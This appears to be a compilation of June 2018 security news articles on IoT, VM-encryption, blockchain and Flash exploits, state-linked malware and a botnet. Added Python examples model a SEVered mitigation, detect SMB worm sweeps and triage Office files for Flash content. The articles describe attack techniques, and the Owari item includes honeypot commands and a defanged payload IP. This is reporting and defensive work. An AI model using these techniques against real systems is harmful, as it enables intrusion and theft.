PornHub wants you to keep your porn viewing activities private, and it is ready to help you out with its all-new VPN service.
Yes, you heard that right.
Adult entertainment giant PornHub has launched its very own VPN service today with "free and unlimited bandwidth" to help you keep prying eyes away from your browsing activity.

Dubbed VPNhub, the VPN service by PornHub is available for both mobile and desktop platforms, including Android, iOS, macOS, and Windows.
VPN, or Virtual Private Network, allows users to transmit data anonymously, avoids ISP-level website blocking or tracking and keeps your browsing activity private by encrypting your data, even when you are on public Wi-Fi connections.

VPNhub promises never to store, collect, sell, or share your personal information with any third parties for their marketing, advertising or research purposes.

However, in its privacy policy under the heading, "How We Use Your Information," the company says it can sell "aggregate or non-personally identifiable information with non-affiliated third parties for advertising, marketing or research purposes."
Since some governments, including that of the United Kingdom, are regulating adult content online, a VPN service from Pornhub makes sense.

VPNhub is available in countries across the globe except for Burma/Myanmar, Cuba, Iran, North Korea, Sudan, and Syria, due to the ban imposed by the U.S. government.
While mobile users (both iOS and Android) can download and use the VPNhub app for free, desktop users (MacOS and Windows) have to purchase a premium account.
You can also upgrade your free account to a premium subscription for $13 a month or $90 for a full year, which eliminates ads, provides faster connection speeds, and opens up "servers from a wide range of countries."
You can try premium VPNhub using its 7-day free trial.

Z-Wave Downgrade Attack Left Over 100 Million IoT Devices Open to Hackers
7.6.2018 thehackernews  IoT

Researchers have found that, even with an advanced encryption scheme in place, more than 100 million Internet-of-Things (IoT) devices from thousands of vendors are vulnerable to a downgrade attack that could allow attackers to gain unauthorized access to your devices.
The issue resides in the implementation of the Z-Wave protocol, a wireless, radio frequency (RF) based communications technology primarily used by home automation devices to communicate with each other.
The Z-Wave protocol has been designed to offer an easy pairing process and remote control of appliances, such as lighting control, security systems, thermostats, windows, locks, swimming pools and garage door openers, over a distance of up to 100 meters (330 feet).

The latest security standard for Z-Wave, called S2 security framework, uses an advanced key exchange mechanism, i.e., Elliptic-Curve Diffie-Hellman (ECDH) anonymous key agreement protocol, to share unique network keys between the controller and the client device during the pairing process.
Even after Silicon Labs, the company that owns Z-Wave, made it mandatory for certified IoT devices to use the latest S2 security standard, millions of smart devices still support the older, insecure version of the pairing process, called the S0 framework, for compatibility.
The S0 standard was found to have a critical vulnerability in 2013 due to its use of a hardcoded encryption key (i.e. 0000000000000000) to protect the network key, allowing attackers in range of the targeted devices to intercept the communication.

After analyzing Z-Wave, security researchers from UK-based Pen Test Partners discovered that devices which support both versions of key-sharing mechanisms could be forced to downgrade the pairing process from S2 to S0.
Dubbed Z-Shave by the researchers, the downgrade attack makes it easier for an attacker in range during the pairing process to intercept the key exchange, and obtain the network key to command the device remotely.

Researchers found the vulnerability while comparing the key exchange processes of S0 and S2, where they noticed that the node info command, which contains the security class, is transferred entirely unencrypted and unauthenticated, allowing attackers to intercept it or to broadcast a spoofed node info command without the security class set.

The researchers—Ken Munro and Andrew Tierney—used the Conexis L1 Smart Door Lock, a flagship product of British company Yale that ships for $360, for their exploit, and were able to downgrade its security, and eventually steal the keys and get permanent access to the Yale lock, and therefore the building protected by it, all without the actual user's knowledge.
You can also watch the video of the Z-Shave attack, wherein the researchers demonstrated how an attacker could unlock a door.

The S0 decryption attack was initially revealed by cybersecurity consulting company SensePost back in 2013, but at that time, Silicon Labs didn't see this issue "as a serious threat in the real world" because it was limited to the timeframe of the pairing process.
Silicon Labs published a blog post in response to the Pen Test Partners' findings on Wednesday, saying the company is confident its smart devices are secure and not vulnerable to such threats.
"S2 is the best-in-class standard for security in the smart home today, with no known vulnerabilities, and mandatory for all new Z-Wave products submitted for certification after April 2, 2017," reads the blog post.
However, the company said that since the adoption of S2 framework across the ecosystem could not happen overnight, the issue existed in Z-Wave for providing backward compatibility, so that S2 devices can work in an S0 network (and vice versa).
The company also said there are procedures in place to notify and alert users in times when secure devices connect to networks using downgraded communications, but IoT device manufacturers hardly provide any user interface to show such alerts, leaving users unaware of this attack.

Researchers Defeat AMD's SEV Virtual Machine Encryption
7.6.2018 thehackernews  Safety

German security researchers claim to have found a new practical attack against virtual machines (VMs) protected using AMD's Secure Encrypted Virtualization (SEV) technology that could allow attackers to recover plaintext memory data from guest VMs.
AMD's Secure Encrypted Virtualization (SEV) technology, which comes with the EPYC line of processors, is a hardware feature that encrypts the memory of each VM in a way that only the guest itself can access the data, protecting it from other VMs/containers and even from an untrusted hypervisor.

Discovered by researchers from the Fraunhofer Institute for Applied and Integrated Security in Munich, the page-fault side channel attack, dubbed SEVered, takes advantage of the lack of integrity protection in the page-wise encryption of main memory, allowing a malicious hypervisor to extract the full content of main memory in plaintext from SEV-encrypted VMs.
Here's the outline of the SEVered attack, as briefed in the paper:
"While the VM’s Guest Virtual Address (GVA) to Guest Physical Address (GPA) translation is controlled by the VM itself and opaque to the HV, the HV remains responsible for the Second Level Address Translation (SLAT), meaning that it maintains the VM’s GPA to Host Physical Address (HPA) mapping in main memory.
"This enables us to change the memory layout of the VM in the HV. We use this capability to trick a service in the VM, such as a web server, into returning arbitrary pages of the VM in plaintext upon the request of a resource from outside."
"We first identify the encrypted pages in memory corresponding to the resource, which the service returns as a response to a specific request. By repeatedly sending requests for the same resource to the service while re-mapping the identified memory pages, we extract all the VM's memory in plaintext."
During their tests, the team was able to extract a test server's entire 2GB memory data, which also included data from another guest VM.
In their experimental setup, the researchers used a Linux-based system powered by an AMD Epyc 7251 processor with SEV enabled, running the Apache and Nginx web servers as well as an OpenSSH server, each in a separate VM.

As the malicious HV, the researchers used the system's Kernel-based Virtual Machine (KVM) and modified it to observe when software within a guest accessed physical RAM.
With the Apache and Nginx web servers, memory extraction was fast (79.4 KB/sec), while OpenSSH's higher response time reduced the extraction speed to only 41.6 KB/sec.
"Our evaluation shows that SEVered is feasible in practice and that it can be used to extract the entire memory from an SEV-protected VM within a reasonable time," the researchers said. "The results specifically show that critical aspects, such as noise during the identification and the resource stickiness are managed well by SEVered."
The researchers also recommended a few steps AMD could take to isolate the transition process between the host and Guest Physical Address (GPA) to mitigate the SEVered attack.
The best solution is to provide "a full-featured integrity and freshness protection of guest-pages additional to the encryption, as realized in Intel SGX. However, this likely comes with a high silicon cost to protect full VMs compared to SGX enclaves."
However, securely combining the hash of the page’s content with the guest-assigned GPA could be a low-cost, efficient solution, which ensures "pages cannot easily be swapped by changing the GPA to HPA mapping."
The research was carried out by four Fraunhofer AISEC researchers, Mathias Morbitzer, Manuel Huber, Julian Horsch and Sascha Wessel, and is described in their paper [PDF] titled "SEVered: Subverting AMD’s Virtual Machine Encryption."
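To make the proposed mitigation concrete, here is an added toy model (not the researchers' code, and with SEV's memory encryption abstracted away) in which the hypervisor owns the GPA-to-HPA mapping and each page carries a tag bound to its content and guest-assigned GPA; the hash function, page layout and tag storage are assumptions.

```python
"""Toy model of the page-binding check proposed against SEVered (constructed
example, not the researchers' code). The hypervisor controls the GPA->HPA
mapping (SLAT); binding each page's tag to (GPA, content) exposes a page that
has been remapped under a different GPA. Encryption is abstracted away: the
point is the missing integrity/binding, not the confidentiality."""
import hashlib
from typing import Dict, Optional

PAGE_SIZE = 4096

# Constructed sample pages: a public resource a service would return, and a
# secret page that a remapping attack would try to leak through that service.
RESOURCE_PAGE = b"HTTP/1.1 200 OK\r\n\r\n<html>index</html>".ljust(PAGE_SIZE, b"\0")
SECRET_PAGE = b"-----BEGIN PRIVATE KEY----- (constructed)".ljust(PAGE_SIZE, b"\0")


class IntegrityError(Exception):
    """Raised when a page's tag does not match the GPA it is accessed through."""


def page_tag(gpa: int, content: bytes) -> bytes:
    """Tag = H(GPA || content). SHA-256 is an assumption; the paper only asks
    that the content hash be securely combined with the guest-assigned GPA."""
    return hashlib.sha256(gpa.to_bytes(8, "little") + content).digest()


class HostMemory:
    """Physical pages indexed by HPA plus per-page tags. The tags are assumed
    to live outside the hypervisor's reach (e.g. hardware-managed metadata)."""

    def __init__(self) -> None:
        self.pages: Dict[int, bytes] = {}
        self.tags: Dict[int, bytes] = {}


class Guest:
    """A SEV guest whose GPA->HPA mapping is maintained by the hypervisor."""

    def __init__(self, host: HostMemory) -> None:
        self.host = host
        self.slat: Dict[int, int] = {}
        self._next_hpa = 0x10000

    def write_page(self, gpa: int, content: bytes) -> None:
        """Guest writes a page; hardware records the tag bound to this GPA."""
        if len(content) != PAGE_SIZE:
            raise ValueError("content must be exactly one page")
        if gpa not in self.slat:
            self.slat[gpa] = self._next_hpa
            self._next_hpa += PAGE_SIZE
        hpa = self.slat[gpa]
        self.host.pages[hpa] = content
        self.host.tags[hpa] = page_tag(gpa, content)

    def read_page(self, gpa: int, enforce_binding: bool) -> bytes:
        """Guest reads a page. With enforce_binding the tag is recomputed from
        the GPA actually used and compared to the stored one, so a page that
        was written under a different GPA fails the check."""
        hpa = self.slat[gpa]
        content = self.host.pages[hpa]
        if enforce_binding and self.host.tags[hpa] != page_tag(gpa, content):
            raise IntegrityError(f"page at GPA {gpa:#x} was remapped")
        return content


def hypervisor_swap(guest: Guest, gpa_a: int, gpa_b: int) -> None:
    """Models the HV-side step the paper describes: the SLAT entry for gpa_a
    is pointed at the physical page that currently backs gpa_b."""
    guest.slat[gpa_a] = guest.slat[gpa_b]


def simulate(enforce_binding: bool, remap: bool) -> Optional[bytes]:
    """Returns what the service hands out for the resource page, or None when
    the GPA-bound integrity check blocks the read."""
    host = HostMemory()
    guest = Guest(host)
    resource_gpa, secret_gpa = 0x2000, 0x3000
    guest.write_page(resource_gpa, RESOURCE_PAGE)
    guest.write_page(secret_gpa, SECRET_PAGE)
    if remap:
        hypervisor_swap(guest, resource_gpa, secret_gpa)
    try:
        return guest.read_page(resource_gpa, enforce_binding)
    except IntegrityError:
        return None


if __name__ == "__main__":
    leaked = simulate(enforce_binding=False, remap=True)
    print("encryption only, remapped:", "secret leaked" if leaked == SECRET_PAGE else "no leak")
    blocked = simulate(enforce_binding=True, remap=True)
    print("GPA-bound tags, remapped:", "read blocked" if blocked is None else "leaked")
    print("GPA-bound tags, no remap: resource intact =", simulate(True, False) == RESOURCE_PAGE)
```

Without the binding the swapped mapping hands the secret page to whoever requests the public resource; with it, the same swap is caught before the page is returned, while legitimate reads are unaffected.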

Critical RCE Flaw Discovered in Blockchain-Based EOS Smart Contract System
7.6.2018 thehackernews 

Security researchers have discovered a series of new vulnerabilities in EOS blockchain platform, one of which could allow remote hackers to take complete control over the node servers running the critical blockchain-based applications.
EOS is an open source smart contract platform, known as 'Blockchain 3.0,' that allows developers to build decentralized applications over blockchain infrastructure, just like Ethereum.
Discovered by Chinese security researchers at Qihoo 360 (Yuki Chen of the Vulcan team and Zhiniang Peng of the Core security team), the vulnerability is a buffer out-of-bounds write issue in the function that node servers use to parse contracts.

To achieve remote code execution on a targeted node, all an attacker needs to do is upload a maliciously crafted WASM file (a smart contract) written in WebAssembly to the server.

As soon as the vulnerable parser process reads the WASM file, the malicious payload is executed on the node, which could then also be used to take control over a supernode in the EOS network (the servers that collect transaction information and pack it into blocks).
"With the out of bound write primitive, we can overwrite the WASM memory buffer of a WASM module instance," the duo explained in their blog post published today.
"And with the help of our malicious WASM code, we finally achieve arbitrary memory read/write in the nodeos process and bypass the common exploit mitigation techniques such as DEP/ASLR on 64-bits OS. Once successfully exploited, the exploit starts a reverse shell and connects back to the attacker."
Once the attackers gained control over the supernode, they could eventually "pack the malicious contract into the new block and further control all nodes of the EOS network."

Since the supernode system can be controlled, the researchers said the attackers can "do whatever they want," including controlling virtual currency transactions and acquiring other financial and private data from the node systems participating in the EOS network, such as digital currency exchanges, users' keys stored in wallets, key user profiles, private data, and much more.
"What's more, the attacker can turn a node in the EOS network into a member of a botnet, launch a cyber attack or become a free 'miner' and dig up other digital currencies," the researchers told THN.
Researchers have detailed how to reproduce the vulnerability and also released a proof-of-concept exploit, along with a video demonstration, which you can watch on their blog post.
The exploit demonstrated by the 360Vulcan researchers can bypass multiple default security mitigations to achieve complete control over the supernode running the malicious contract.
The pair responsibly reported the vulnerability to the maintainers of the EOS project, and they have already released a fix for the issue on GitHub.
"In Blockchain networks and digital currency systems, there are many attack surfaces existing in nodes, digital wallets, mining pools and smart contracts. 360 security team has previously discovered and disclosed multiple relevant high risk vulnerabilities."
The researchers believe the new type of vulnerabilities affect not only EOS alone but also other types of Blockchain platforms and virtual currency applications.

Yahoo Hacker linked to Russian Intelligence Gets 5 Years in U.S. Prison
7.6.2018 thehackernews  Crime

A 23-year-old Canadian man, who pleaded guilty last year for his role in helping Russian government spies hack into email accounts of Yahoo users and other services, has been sentenced to five years in prison.
Karim Baratov (a.k.a Karim Taloverov, a.k.a Karim Akehmet Tokbergenov), a Kazakhstan-born Canadian citizen, was also ordered on Tuesday by United States Judge Vince Chhabria to pay a fine of $250,000.
Baratov had previously admitted his role in the 2014 Yahoo data breach that compromised about 500 million Yahoo user accounts. His role was to "hack webmail accounts of individuals of interest to the FSB," Russia's spy agency.
In November, Baratov pleaded guilty to a total of nine counts, including one count of conspiring to violate the Computer Fraud and Abuse Act, and eight counts of aggravated identity theft.
According to the US Justice Department, Baratov and his co-defendant hacker Alexsey Belan worked for two agents—Dmitry Dokuchaev and Igor Sushchin—from the FSB (Federal Security Service) to compromise the accounts.
The Justice Department announced charges against all four in March last year, which resulted in the arrest of Baratov at his home in Ancaster, near Toronto, and then his extradition to the United States.
However, Belan, who is already on the FBI's Most Wanted Hackers list, and both FSB officers currently reside in Russia, so they are unlikely to face the consequences for their involvement.
Baratov ran an illegal no-questions-asked hacking service from 2010 until his arrest in March 2017, charging customers around $100 to obtain another person's webmail password by tricking the victim into entering their credentials into a fake password reset page.
According to the court documents, Baratov managed to crack more than 11,000 email accounts in both Russia as well as the United States before the Toronto Police Department caught him.
As part of his plea, Baratov admitted to hacking thousands of webmail accounts over seven years and sending those accounts' passwords to Russian spy Dokuchaev in exchange for money.
The targeted attack allowed the four to gain direct access to Yahoo's internal networks, and once in, co-defendant hacker Belan started poking around the network.
According to the FBI, Belan discovered two key assets:
Yahoo's User Database (UDB) – a database containing personal information about all Yahoo users.
The Account Management Tool – an administrative tool used to make alterations to the targeted accounts, including their passwords.
Belan then used the file transfer protocol (FTP) to download Yahoo's UDB, which included password recovery emails and cryptographic values unique to each Yahoo account, eventually enabling Belan and Baratov to access specific accounts of interest to the Russian spies.
According to Baratov's lawyers, at the time of the crime, Baratov had no idea he was working with Russian FSB agents.

Russia asks Apple to remove Telegram Messenger from the App Store
7.6.2018 thehackernews  BigBrothers

Russia's communications regulator Roskomnadzor has threatened Apple with consequences if the company does not remove the secure messaging app Telegram from its App Store.
Back in April, the Russian government banned Telegram in the country for the company's refusal to hand over private encryption keys to Russian state security services to access messages sent using the secure service.
However, so far, the Telegram app is still available in the Russian version of Apple's App Store.
So in an effort to entirely ban Telegram, state watchdog Roskomnadzor reportedly sent a legally binding letter to Apple asking it to remove the app from its Russian App Store and block it from sending push notifications to local users who have already downloaded the app.
Roskomnadzor's director Alexander Zharov said he is giving the company one month to remove the Telegram app from its App Store before the regulator enforces punishment for violations.
For those unfamiliar with the app, Telegram offers end-to-end encryption for secure messaging, so that no one, not even Telegram, can access the messages that are sent between users.
However, despite being banned in April, the majority of users in Russia are still using the app via Virtual Private Networks (VPNs), and only 15 to 30 percent of Telegram's operations in the country have been disrupted so far, Roskomnadzor announced yesterday.
This failure leads the regulator to turn to Apple for help taking the app down.
"In order to avoid possible action by Roskomnadzor for violations of the functioning of the above-mentioned Apple Inc. service, we ask you to inform us as soon as possible about your company’s further actions to resolve the problematic issue," said Roskomnadzor in the letter.
Roskomnadzor also says it is in talks with Google to ban the Telegram app from Google Play as well.
Roskomnadzor is a federal executive body in Russia which is responsible for overseeing the media, including the electronic media, mass communications, information technology and telecommunications; organizing the work of the radio-frequency service; and overseeing compliance with the law protecting the confidentiality of its users' personal data.
Roskomnadzor wanted Telegram to share its users' chats and encryption keys with the state security services, as the encrypted messaging app is widely popular among terrorists that operate inside Russia.
However, Telegram declined to comply with the requirements.
Apple has generally expressed its support for encryption and data security in the past, but we have seen the company comply with local demands.
Last year, Apple removed all VPN apps from its App Store in China, making it harder for internet users to bypass the country's Great Firewall, and moved its iCloud operations to a local firm linked to the Chinese government.
Also, at the end of last year, Apple pulled Skype, along with several similar apps, from its App Store in China.

FBI issues alert over two new malware linked to Hidden Cobra hackers
7.6.2018 thehackernews 

The US-CERT has released a joint technical alert from the DHS and the FBI, warning about two newly identified malware families being used by the prolific North Korean APT hacking group known as Hidden Cobra.
Hidden Cobra, often known as Lazarus Group and Guardians of Peace, is believed to be backed by the North Korean government and known to launch attacks against media organizations, aerospace, financial and critical infrastructure sectors across the world.
The group was even associated with the WannaCry ransomware menace that last year shut down hospitals and businesses worldwide. It is reportedly also linked to the 2014 Sony Pictures hack, as well as the SWIFT Banking attack in 2016.
Now, the Department of Homeland Security (DHS) and the FBI have uncovered two new pieces of malware that Hidden Cobra has been using since at least 2009 to target companies working in the media, aerospace, financial, and critical infrastructure sectors across the world.
The two malware families Hidden Cobra is using are a Remote Access Trojan (RAT) known as Joanap and a Server Message Block (SMB) worm called Brambul. Let's get into the details of both, one by one.
Joanap—A Remote Access Trojan
According to the US-CERT alert, "fully functional RAT" Joanap is a two-stage malware that establishes peer-to-peer communications and manages botnets designed to enable other malicious operations.
The malware typically infects a system as a file delivered by other malware, which users unknowingly download either when they visit websites compromised by the Hidden Cobra actors, or when they open malicious email attachments.
Joanap receives commands from a remote command and control server controlled by the Hidden Cobra actors, giving them the ability to steal data, install and run more malware, and initialize proxy communications on a compromised Windows device.
Other functionalities of Joanap include file management, process management, creation and deletion of directories, botnet management, and node management.
During analysis of the Joanap infrastructure, the U.S. government has found the malware on 87 compromised network nodes in 17 countries including Brazil, China, Spain, Taiwan, Sweden, India, and Iran.
Brambul—An SMB Worm
Brambul is a brute-force authentication worm that, like the devastating WannaCry ransomware, abuses the Server Message Block (SMB) protocol in order to spread itself to other systems.
The malicious Windows 32-bit SMB worm functions as a service dynamic link library file or a portable executable file often dropped and installed onto victims' networks by dropper malware.
"When executed, the malware attempts to establish contact with victim systems and IP addresses on victims' local subnets," the alert notes.
"If successful, the application attempts to gain unauthorized access via the SMB protocol (ports 139 and 445) by launching brute-force password attacks using a list of embedded passwords. Additionally, the malware generates random IP addresses for further attacks."
Once Brambul gains unauthorized access to a system, the malware sends information about the victim's system to the Hidden Cobra hackers by email. The information includes the IP address and hostname, as well as the username and password, of each victim's system.
The hackers can then use this stolen information to remotely access the compromised system via the SMB protocol. The actors can even generate and execute what analysts call a "suicide script."
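A detection angle on the worm behaviour the alert describes, as an added example (not from US-CERT, DHS or the FBI): it flags a host that contacts many distinct peers on TCP 139/445 inside a short window and splits those peers into the host's own /24 (the local-subnet sweep) and addresses elsewhere (the random-address probing). The key=value log format, the /24 local-subnet assumption, the thresholds and the sample lines are all constructed.

```python
# Flag SMB sweeps in flow/firewall logs: one source, many distinct peers on
# 139/445 within a sliding window. Added example; format and data constructed.
import ipaddress
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

SMB_PORTS = {139, 445}
WINDOW = timedelta(seconds=60)   # sliding window per source host
MIN_TARGETS = 8                  # distinct SMB peers before alerting (tunable)

# Constructed log lines. 10.0.0.5 behaves like the worm: a sweep of its own
# /24 followed by attempts at apparently random addresses. 10.0.0.7 is a
# normal client talking to one file server; 10.0.0.8 is non-SMB traffic.
SAMPLE_LOG = """\
2018-06-07T10:00:00Z src=10.0.0.7 dst=10.0.0.2 dport=445 action=allow
2018-06-07T10:00:02Z src=10.0.0.5 dst=10.0.0.10 dport=445 action=allow
2018-06-07T10:00:03Z src=10.0.0.5 dst=10.0.0.11 dport=445 action=allow
2018-06-07T10:00:04Z src=10.0.0.5 dst=10.0.0.12 dport=139 action=deny
2018-06-07T10:00:05Z src=10.0.0.5 dst=10.0.0.13 dport=445 action=allow
2018-06-07T10:00:06Z src=10.0.0.5 dst=10.0.0.14 dport=445 action=deny
2018-06-07T10:00:07Z src=10.0.0.5 dst=10.0.0.15 dport=445 action=allow
2018-06-07T10:00:08Z src=10.0.0.5 dst=10.0.0.16 dport=445 action=allow
2018-06-07T10:00:09Z src=10.0.0.5 dst=10.0.0.17 dport=445 action=deny
2018-06-07T10:00:10Z src=10.0.0.5 dst=10.0.0.18 dport=445 action=allow
2018-06-07T10:00:11Z src=10.0.0.5 dst=10.0.0.19 dport=445 action=allow
2018-06-07T10:00:12Z src=10.0.0.5 dst=203.0.113.9 dport=445 action=deny
2018-06-07T10:00:13Z src=10.0.0.5 dst=198.51.100.77 dport=445 action=deny
2018-06-07T10:00:14Z src=10.0.0.5 dst=192.0.2.33 dport=445 action=deny
2018-06-07T10:00:15Z src=10.0.0.7 dst=10.0.0.2 dport=445 action=allow
2018-06-07T10:00:16Z src=10.0.0.8 dst=198.51.100.5 dport=80 action=allow
2018-06-07T10:00:30Z src=10.0.0.7 dst=10.0.0.2 dport=445 action=allow
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)"
)


def parse(line):
    """Return (timestamp, src, dst, dport), or None for lines we don't understand."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ts, m["src"], m["dst"], int(m["dport"])


def detect_smb_sweeps(lines, min_targets=MIN_TARGETS, window=WINDOW):
    """Flag sources that contact >= min_targets distinct hosts on SMB ports
    within one sliding window. Each alert describes the most recent window in
    which the threshold held, split into peers on the source's own /24
    (assumed local subnet) and peers outside it."""
    events = sorted(e for e in map(parse, lines) if e and e[3] in SMB_PORTS)
    recent = defaultdict(deque)        # src -> deque of (ts, dst) in window
    alerts = {}
    for ts, src, dst, _port in events:
        q = recent[src]
        q.append((ts, dst))
        while ts - q[0][0] > window:   # drop peers that fell out of the window
            q.popleft()
        peers = {d for _, d in q}
        if len(peers) < min_targets:
            continue
        subnet = ipaddress.ip_network(f"{src}/24", strict=False)
        local = sum(ipaddress.ip_address(d) in subnet for d in peers)
        alerts[src] = {
            "src": src, "first_seen": q[0][0], "last_seen": ts,
            "targets": len(peers), "local": local, "external": len(peers) - local,
        }
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_smb_sweeps(SAMPLE_LOG.splitlines()):
        print(f"{a['src']}: {a['targets']} SMB peers in {WINDOW.seconds}s "
              f"({a['local']} on local /24, {a['external']} elsewhere)")
```

A source that only talks to one file server, however often, never trips the rule; the interesting signal is breadth of peers, not volume.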
DHS and FBI have also provided downloadable lists of IP addresses with which the Hidden Cobra malware communicates and other IOCs, to help you block them and enable network defenses to reduce exposure to any malicious cyber activity by the North Korean government.
DHS also recommends that users and administrators follow best practices as preventive measures to protect their networks, such as keeping software and systems up to date, running antivirus software, turning off SMB, and forbidding unknown executables and software applications.
Last year, the DHS and the FBI published an alert describing Hidden Cobra malware, called Delta Charlie—a DDoS tool which they believed North Korea uses to launch distributed denial-of-service (DDoS) attacks against its targets.
Other malware linked to Hidden Cobra in the past include Destover, Wild Positron or Duuzer, and Hangman with sophisticated capabilities, like DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware.

Adobe fixed the CVE-2018-5002 Flash Zero-Day exploited in targeted attacks in the Middle East

7.6.2018 securityaffairs Exploit

Adobe has recently fixed several vulnerabilities, including the CVE-2018-5002 Flash Zero-Day exploited in targeted attacks in the Middle East
Adobe has released security updates for Flash Player that address four vulnerabilities, including a critical issue (CVE-2018-5002) that has been exploited in targeted attacks mainly aimed at entities in the Middle East.

The CVE-2018-5002 vulnerability, reported by researchers at ICEBRG, Qihoo 360 and Tencent, is a stack-based buffer overflow that can be exploited by attackers for arbitrary code execution.

“Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address critical vulnerabilities in Adobe Flash Player and earlier versions. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

“Adobe is aware of a report that an exploit for CVE-2018-5002 exists in the wild, and is being used in limited, targeted attacks against Windows users. These attacks leverage Office documents with embedded malicious Flash Player content distributed via email.”

The researcher did not disclose technical details of the vulnerability, but Adobe confirmed that the zero-day was exploited in targeted attacks against Windows users.

Attackers launched spear phishing attacks using messages with weaponized Office documents (an Excel spreadsheet named “salary.xlsx”) that contain specially crafted Flash content.

“The hackers carefully constructed an Office document that remotely loaded Flash vulnerability. When the document was opened, all the exploit code and malicious payload were delivered through remote servers. This attack mainly targets the Middle East.” reads the analysis published by Qihoo 360.
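A triage check for the lure described above, as an added example (not from Adobe or Qihoo 360): it opens an OOXML workbook as a zip, searches every part for the Shockwave Flash ActiveX CLSID in both text and raw GUID form, and lists relationship targets marked External, since the analysed document loaded its Flash content from a remote server. The sample workbook, its part layout and its URL are constructed.

```python
# Triage an OOXML document for embedded Flash ActiveX content and remote
# relationship targets. Added example; the sample workbook is constructed.
import io
import re
import uuid
import zipfile

# Shockwave Flash Object CLSID (a fixed, public identifier).
FLASH_CLSID = uuid.UUID("D27CDB6E-AE6D-11CF-96B8-444553540000")
FLASH_TEXT = str(FLASH_CLSID).encode()   # lowercase text form used in XML parts
FLASH_BIN = FLASH_CLSID.bytes_le         # byte order a GUID is stored in OLE/.bin

REL_RE = re.compile(rb"<Relationship\b[^>]*>")
TARGET_RE = re.compile(rb'Target="([^"]*)"')


def external_targets(rels_xml):
    """Targets of relationships marked TargetMode="External" (remote content)."""
    out = []
    for rel in REL_RE.findall(rels_xml):
        if b'TargetMode="External"' in rel:
            m = TARGET_RE.search(rel)
            if m:
                out.append(m.group(1).decode(errors="replace"))
    return out


def triage_ooxml(blob):
    """Return findings for an OOXML package given as bytes."""
    findings = {"flash_parts": [], "activex_parts": [], "external_targets": []}
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        for name in z.namelist():
            data = z.read(name)
            low = name.lower()
            if "/activex/" in low or "/embeddings/" in low:
                findings["activex_parts"].append(name)
            # Text form may be upper or lower case; .bin parts hold the raw GUID.
            if FLASH_TEXT in data.lower() or FLASH_BIN in data:
                findings["flash_parts"].append(name)
            if low.endswith(".rels"):
                findings["external_targets"] += external_targets(data)
    findings["suspicious"] = bool(findings["flash_parts"])
    return findings


def build_sample_xlsx():
    """Constructed lure: a minimal workbook-shaped zip with a Flash ActiveX
    part and a relationship pointing at a remote (placeholder) URL."""
    activex_xml = (
        b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        b'<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" '
        b'ax:classid="{D27CDB6E-AE6D-11CF-96B8-444553540000}" '
        b'ax:persistence="persistStreamInit"/>'
    )
    rels = (
        b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        b'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        b'<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
        b'Target="http://example.invalid/remote.swf" TargetMode="External"/>'
        b"</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", b"<Types/>")
        z.writestr("xl/workbook.xml", b"<workbook/>")
        z.writestr("xl/worksheets/sheet1.xml", b"<worksheet/>")
        z.writestr("xl/activeX/activeX1.xml", activex_xml)
        z.writestr("xl/activeX/activeX1.bin", b"\x00" * 8 + FLASH_BIN + b"\x00" * 8)
        z.writestr("xl/worksheets/_rels/sheet1.xml.rels", rels)
    return buf.getvalue()


def build_benign_xlsx():
    """Constructed control: the same skeleton with no ActiveX or external parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", b"<Types/>")
        z.writestr("xl/workbook.xml", b"<workbook/>")
        z.writestr("xl/worksheets/sheet1.xml", b"<worksheet/>")
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in (("lure", build_sample_xlsx()), ("benign", build_benign_xlsx())):
        print(label, triage_ooxml(blob))
```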


The Flash Player update also addresses the following vulnerabilities:

CVE-2018-4945 – a critical type confusion vulnerability that can lead to code execution, it was reported by researchers at Tencent.
CVE-2018-5000 – an “important” severity integer overflow that can lead to information disclosure, it was reported anonymously through Trend Micro’s Zero Day Initiative (ZDI).
CVE-2018-5001 – an “important” out-of-bounds read flaw that can lead to information disclosure, it was reported anonymously through Trend Micro’s Zero Day Initiative (ZDI).
This is the second Adobe zero-day discovered in 2018; the first, tracked as CVE-2018-4878, was patched in February after it was exploited by North Korea-linked nation-state hackers in attacks aimed at South Korea. The flaw was later exploited by different cybercrime gangs.

According to the analysis published by Qihoo 360, attackers had been preparing the recently detected campaign since at least February. The C&C domain appears to be a job search website in the Middle East, and its name leads the experts to believe that the target is located in Doha, Qatar.

“Through analysis, we can see that the attack used a 0-day vulnerability regardless of the cost. The attacker developed sophisticated plans in the cloud and spent at least three months preparing for the attack. The detailed phishing attack content was also tailored to the attack target. All clues show this is a typical APT attack. We suggest all relevant organizations and users to update their Flash to the latest versions in a timely manner. ” concludes Qihoo 360.

It’s not a joke, Owari botnet operators used root as username and password to access a C&C
7.6.2018 securityaffairs BotNet

Security expert Ankit Anubhav discovered a Command and Control server for the Owari botnet protected with weak credentials.
An IoT botnet has been commandeered by white hats after its controllers used a weak username and password combination for its command-and-control server.

Security expert Ankit Anubhav from Newsky Security discovered an IoT botnet controlled through a poorly configured infrastructure: the botmaster used weak credentials for authentication to the command-and-control server.

The researchers exploited the weak configuration to take over the MySQL server used to control the Owari botnet; the author had left port 3306 open, allowing authentication with “root” as both username and password.

“We observed few IPs attacking our honeypots with default credentials, with executing commands like /bin/busybox OWARI post successful login. In one of the cases, a payload hosted on 80(.)211(.)232(.)43 was attempted to be run post download.

When we investigated the IP, we observed that port 3306, the default port for MySQL database, was open.” reads the blog post published by Ankit Anubhav.

